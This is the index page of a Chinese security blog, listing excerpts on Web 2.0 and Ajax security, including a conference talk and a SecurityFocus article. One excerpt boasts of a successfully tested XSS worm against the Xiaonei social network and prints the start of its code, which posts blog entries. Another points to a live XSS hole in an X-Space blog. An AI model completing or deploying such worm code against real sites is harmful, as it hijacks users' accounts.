鬼仔's Blog

来源：腾讯

腾讯科技讯 3月18日，在今日举行的腾讯网络安全技术峰会上，Windows底层和漏洞挖掘方面的专家方兴就现今Web2.0领域的安全问题与解决方法与到场嘉宾进行分享。

以下为方兴发言实录：

方兴：先做个自我介绍，我叫方兴，以前主要关注的领域是操作系统安全漏洞的挖掘，但是现在我给大家做Web2.0的演讲，实际我是抱着学习的态度，因为腾讯公司作为一个网络，在WEB方面的研究应该比我更多一些。首先我们来预览一下今天讲的主要内容。今天WEB时代的安全与发展风险，相对于以前WEB1.0的时代增加了哪些问题。其次我们来看待它的新的安全需求。最后我们来看它的整个安全发展情况。

为什么我这个题目叫新WEB时代而不用Web2.0呢？因为Web2.0只是一个开始，只是个时代发展的序幕，它最终 阅读全文 »

来源：7jdg's blog

下载地址：
http://www.fs2you.com/files/57dedf9c-e48a-11dc-8afb-00142218fc6e/

作者：ycosxhack
来源：余弦函数

前天发现校内网的UBB XSS，code了两天，这只危害性极大的蠕虫编写完毕，测试成功。蠕虫部分代码如下：
function _1() {
src="http://blog.xiaonei.com/NewEntry.do";
var title="\u0033\u002e\u0037\u7ef4\u5ea6 :-(";
//title与_body都将汉字进行16进制双字节编码了，这是解决汉字乱码的一个非常实用的技巧，记住了:-)
阅读全文 »

作者：ycosxhack
来源：余弦函数

昨天将闪吧新社区的博客系统XSS了，它使用X-Space这个开源的PHP+MySQL程序，最新版的X-Space仍然存在严重的XSS漏洞。这个渗透过程没任何难度：http://space.flash8.net/space/?716894。用户可以在自定义CSS时无任何限制地构造任意js代码。由于X-Space经常与Discuz!整合使用（Blog+BBS模式），所以一旦跨站成功，将有可能会威胁到整个系统。
阅读全文 »

　　不知道大家有没有注意到我blog右下角一直有个“最近5天的来源”的统计，我很早就开始用这个了。现在很多时候已经懒得去看统计，直接看一眼这里的来源，就可以知道大概谁链接了我。 ：）
　　记得当时 David 还没有做现在这样的统计系统，当时只是一个小程序，放到自己站上就可以显示了。
　　后来 David 开始做了现在的 Clicki ，前段时间还推出了 Spy 功能，越来越酷了。
阅读全文 »

来源：securityfocus

Introduction

AJAX and interactive web services form the backbone of “web 2.0”applications. This technological transformation brings about newchallenges for security professionals. This article looks at some of the methods, tools and tricks to dissectweb 2.0 applications (including Ajax) and discover security holes 阅读全文 »

作者：梦之光芒（Monyer）

05年初，随着web2.0这个字眼在中国的各大网络媒体上如潮水般的涌现，Ajax技术（AJAX，即"Asynchronous JavaScript And XML"的缩写，可翻译为异步JavaScript及XML技术。其核心是一个寄宿在浏览器中名为XMLHTTPRequest的类）也立即成为了大家学习研究及讨论的焦点。当然凡事有利亦有弊，黑客们很快就找到了Ajax的可攻击弱点——SQL资料隐码(SQL injections)、跨站脚本(cross-site scripting)和服务拒绝攻击（Denial of Service）等。只是当时web2.0技术尚没 阅读全文 »